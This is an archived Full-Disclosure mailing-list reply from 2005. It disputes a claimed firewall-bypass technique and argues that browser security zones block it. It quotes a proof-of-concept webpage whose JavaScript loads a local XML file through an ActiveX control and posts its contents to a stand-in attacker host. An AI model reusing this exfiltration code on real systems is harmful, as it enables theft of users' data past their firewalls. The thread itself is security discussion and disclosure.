RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data



-----Original Message-----
From: Gaurav Kumar
Sent: Wednesday, December 21, 2005 8:59 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Cc: websecurity@xxxxxxxxxxxxx
Subject: [Full-disclosure] new attack technique? using
JavaScript+XML+OWSPost Data

1>> A Trojan has been to be placed in a system running an
1>> application firewall like Zone Alarm Pro etc.

>> Assumptions:

2>> The target system must be having office XP and the user has
2>> to be lured to view a webpage hosted by attacker.

3>> The Trojan can be designed to generate an xml
3>> file which will contain the data to be sent out. The attacker will lure
the
3>> user to visit a website hosted by him.

Lol !! In a practical scenario, the attacker who spreads the worm/trojans
himself is not aware in the initial stage which are the infected machines
unless the trojan sends back the machine/user info back to the attacker. Now
as you have already mentioned ZA is running then no data can be sent back to
the attacker. So the attacker is clueless which are those infected machines.
So the case of luring the user to visit the link is out of scope...


>> The site can have following HTML code-

Now coming back to technical stuff, You are trying to access a local file
which will only be allowed if the site is in "Trusted Sites" or "Local
Intranet" or "Local Security Zone" and activex not marked safe. The fact
that *the client is also the server* is irrelevant.

Try uploading the script to some webserver and give a html extention; it
will throw an _access denied_ error when the page loads (even on Win XP +
SP1).

In case of any server side extention like *.asp, *.jsp etc, the user will be
prompted that an malicious component is trying to load and ask for user
permission.


>> <html>
>> <body>
>> The author is not responsible for any misuse,
>> this PoC is for educational purpose only.
>> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
>> id="exp">
>> </object>
>> <script LANGUAGE=javascript>
>> var xmlDoc
>> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
>> xmlDoc.async=false;
>> xmlDoc.load("c:\\note.xml");
>> xmlObj=xmlDoc.documentElement;
>> var a= xmlObj.firstChild.text;
>> exp.Post(0,"http://www.attackersite.com/input.asp",a);
>> </script>
>> </body>
>> </html>


>> The above code (works well on windows XP SP2) essentials calls
>> "OWS Post Data" COM control to post the contents of note.xml
>> (generated by trojan) to attackersite.com

IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone" and draw
conclusion about "Internet Security Zone".

You may also link to know about this issue -
http://support.microsoft.com/kb/317244/EN-US/


>>> Essentially, the technique is breaking the basic
>>> functionality of application firewalls by using OWS Post Data
>>> as bridge for sending out the data using Javascript and XML.

Not Exactly !! I wud rather suggest you to do a little more research and
draw any conclusion. Keep those _Security Zones_ in mind before you post
anything...


- D


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • [REVS] ACK Tunneling Trojans
    ... Any firewall between the attacker and the victim ... firewalls that do not apply their rule sets on TCP ACK segments (ordinary ... Trojan by mail to a user on the inside of the firewall. ...
    (Securiteam)
  • Re: Are current personal firewall available in the market 100% foo
    ... I tend to doubt that a firewall will slow down you ... upgrading would go a long way to increasing your security. ... web content zone to high and populating your trusted zone with the sites you ... > norton may warn u before downloading a trojan file, ...
    (microsoft.public.security)
  • Re: Sunday, Bloody Sunday - Part 1
    ... Troopers game. ... were using them to mark the edge of zone one, so I knew where the limit ... Have Attacker "fortune cookie" the SuComm model - ... how many points did Defenders have for this gig? ...
    (rec.games.miniatures.warhammer)
  • RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
    ... > 1>> A Trojan has been to be placed in a system running an application ... > 1>> firewall like Zone Alarm Pro etc. ... > 2>> The target system must be having office XP and the user has to be ... > 2>> lured to view a webpage hosted by attacker. ...
    (Full-Disclosure)
  • Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
    ... I must agree to the fact that above technique is NOT efficient in the ... The Trojan will create a cookie using InternetSetCookie and store the ... the attacker will lure the user to visit somesite.com ...
    (Full-Disclosure)